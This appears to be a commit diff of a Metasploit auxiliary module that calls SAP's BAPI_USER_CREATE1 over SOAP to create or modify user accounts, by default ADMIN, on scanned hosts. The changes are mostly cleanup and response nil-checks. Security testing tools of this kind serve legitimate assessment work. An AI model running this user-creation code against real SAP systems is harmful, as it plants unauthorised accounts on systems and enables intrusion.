made requested changes
nmonkee
parent
f82b51b2c4
commit
b9a8791b87
|
|
@ -6,13 +6,13 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This module is based on, inspired by, or is a port of a plugin available in
|
||||
# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
|
||||
# This module is based on, inspired by, or is a port of a plugin available in
|
||||
# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
|
||||
# http://www.onapsis.com/research-free-solutions.php.
|
||||
# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts
|
||||
# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
|
||||
# in producing the Metasploit modules and was happy to share his knowledge and
|
||||
# experience - a very cool guy. I'd also like to thank Chris John Riley,
|
||||
# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
|
||||
# experience - a very cool guy. I'd also like to thank Chris John Riley,
|
||||
# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
|
||||
# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
|
||||
##
|
||||
|
||||
|
|
@ -23,16 +23,15 @@ class Metasploit4 < Msf::Auxiliary
|
|||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'SAP SOAP RFC BAPI_USER_CREATE1',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module calls the RFC BAPI_USER_CREATE1 module (via SOAP).
|
||||
The module can be used for creating/modifying users.
|
||||
},
|
||||
'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
|
||||
'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]],
|
||||
'Author' => ['Agnivesh Sathasivam','nmonkee'],
|
||||
'License' => BSD_LICENSE
|
||||
)
|
||||
|
|
@ -46,7 +45,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
OptString.new('BAPI_USER',[false,'Username for the account (Usrename in upper case only. Default is ADMIN)', 'ADMIN'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def run_host(ip)
|
||||
data = '<?xml version="1.0" encoding="utf-8" ?>'
|
||||
data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
|
||||
|
|
@ -75,10 +74,10 @@ class Metasploit4 < Msf::Auxiliary
|
|||
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
|
||||
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'Authorization' => 'Basic ' + user_pass,
|
||||
'Content-Type' => 'text/xml; charset=UTF-8',
|
||||
'Content-Type' => 'text/xml; charset=UTF-8'
|
||||
}
|
||||
}, 45)
|
||||
if res.code = 200
|
||||
if res and res.code = 200
|
||||
if res.body =~ /<h1>Logon failed<\/h1>/
|
||||
print_error("[SAP] #{ip}:#{rport} - Logon failed")
|
||||
elsif res.body =~ /faultstring/
|
||||
|
|
@ -89,9 +88,8 @@ class Metasploit4 < Msf::Auxiliary
|
|||
print_good("[SAP] #{ip}:#{rport} - User '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}' created")
|
||||
end
|
||||
else
|
||||
print_error("[SAP] #{ip}:#{rport} - Couldn't access " + ip + ":" + port )
|
||||
print_error("[SAP] #{ip}:#{rport} - Error code: " + res.code)
|
||||
print_error("[SAP] #{ip}:#{rport} - Error message: " + res.message)
|
||||
print_error("[SAP] #{ip}:#{rport} - Error code: " + res.code) if res
|
||||
print_error("[SAP] #{ip}:#{rport} - Error message: " + res.message) if res
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("[SAP] #{ip}:#{rport} - Unable to connect")
|
||||
|
|
|
|||
Loading…
Reference in New Issue